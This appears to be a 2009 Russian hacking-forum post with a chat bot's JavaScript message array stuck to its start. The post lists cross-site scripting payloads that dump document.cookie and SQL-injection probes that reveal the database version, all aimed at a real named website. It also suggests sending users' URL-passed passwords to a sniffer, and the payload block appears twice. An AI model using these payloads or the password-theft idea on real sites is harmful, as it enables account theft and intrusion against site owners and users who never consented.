theSummaries[11] = "Бот> Админов ненадо доставать с просьбами дать должность.Я сам тут даю должностя.Набирайте посты и покупайте должностя.";
theSiteLinks[11] = "#";
theSummaries[12] = "Бот> Внимание! В чате есть магазин где продаютсо аваторы и разные фиговинки.";
theSiteLinks[12] = "#";
theSummaries[13] = "Бот> Прошу об одном.Ненагнетайте обстановку в чате.";
theSiteLinks[13] = "#";
theSummaries[14] = "Бот> Приводите друзей к нам мы будем вам признательны";
theSiteLinks[14] = "#";
http://waufon.ru/serv/index.php?ci=427"><script>alert(document.cookie)</script>
А вот тут вкуснее
http://waufon.ru/serv/my/parole.php?ci=427&id=4589&pass=antichat&url="><scr ipt>alert()</script>
пасс хранится в поле pass можем смело отсылать на сниффер, токо для каждого юзверя нужен свой ID
P.S. А в куках он ничё не хранит
P.P.S. А мля он пасс через URL передаёт, ну тогда хз
P.P.P.S: Зарегал antichat:antichat
НЯ!
http://waufon.ru/serv/galery.php?id=4589&pass=antichat&url=&ref=81339&ci =427+AND+1=1--
http://waufon.ru/serv/galery.php?id=4589&pass=antichat&url=&ref=81339&ci =427+AND+1=2--
Версия 5.1.35-log
Последний раз редактировалось Ponchik; 25.11.2009 в 18:58..
http://waufon.ru/serv/index.php?ci=427"><script>alert(document.cookie)</script>
А вот тут вкуснее
http://waufon.ru/serv/my/parole.php?ci=427&id=4589&pass=antichat&url="><scr ipt>alert()</script>
пасс хранится в поле pass можем смело отсылать на сниффер, токо для каждого юзверя нужен свой ID
P.S. А в куках он ничё не хранит
P.P.S. А мля он пасс через URL передаёт, ну тогда хз
P.P.P.S: Зарегал antichat:antichat